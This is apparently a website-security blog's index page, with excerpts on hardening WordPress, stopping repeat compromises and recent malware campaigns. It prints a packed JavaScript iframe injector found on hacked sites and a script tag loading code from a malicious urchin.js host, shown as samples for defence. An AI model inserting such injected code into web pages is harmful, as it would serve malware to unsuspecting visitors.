This post was put together in collaboration with one of our Support Engineers, Bruno Borges. Be sure to take a minute and say thanks for the info; he loves Twitter (when it’s up). It seems every day we’re combating malicious redirections. Often, they are simple, but every day they are evolving, and in some instances become [...]
How To: Stop The Hacker By Hardening WordPress
Every day we service 100s of clients and the question is always asked: “How do you stop these hackers!!!” Unfortunately, it’s perhaps the hardest to explain and understand for most. That being said, this post will be one of a series that talks to what end-users can do to help reduce their threat landscape. This [...]
How to stop the hacker
How to stop the hacker? This is a very common question we get daily. “My site got hacked, how can I stop the hacker from attacking me again?” Stopping the hacker: You can’t really stop the hacker from trying to attack your site, but you can stop him from succeeding in his attempts. Specially [...]
New Malware – eval(function(p,a,c,k,e,d)
We are seeing many WordPress sites on shared hosts getting compromised with an encoded JavaScript malware (using Dean Edwards packer). This is what gets added to the hacked sites: <script>eval(function(p,a,c,k,e,d){e=function(c) {return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))}; if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}]; e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+' \b','g'),k[c])}}return p}('i 9(){a=6.h('b');7(!a){5 0=6.j('k');6.g.l(0); .. 9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px| MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement| iframe|appendChild|src|id|c0m|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent| 1000|hdghdg|navigator|li|showthread|php| 72241732'.split('|'),0,{})) And that code (once decoded by the browser) is used to [...]
SQL injections: nbnjkl.com/urchin.js and jjghui.com/urchin.js
We are seeing many sites compromised with malware from jjghui.com/urchin.js (and now nbnjkl.com/urchin.js). Most of them are IIS/ASP sites and the infection method seems to be similar to the Lizamoon mass infections from a few months ago (SQL injection). This is how it shows on a hacked site: <script src= http://nbnjkl.com/urchin.js ></script> We posted full details [...]
Malware updates: Aug 2011 – .htaccess to .ru and osa.pl, iframes to .cc and .il
We are often asked what the top domains distributing malware were, or which threats we see most often on our security scanner. For the month of August, things were very similar to the previous ones, with a slight increase in the number of WordPress sites compromised due to the Timthumb.php vulnerability. If your site [...]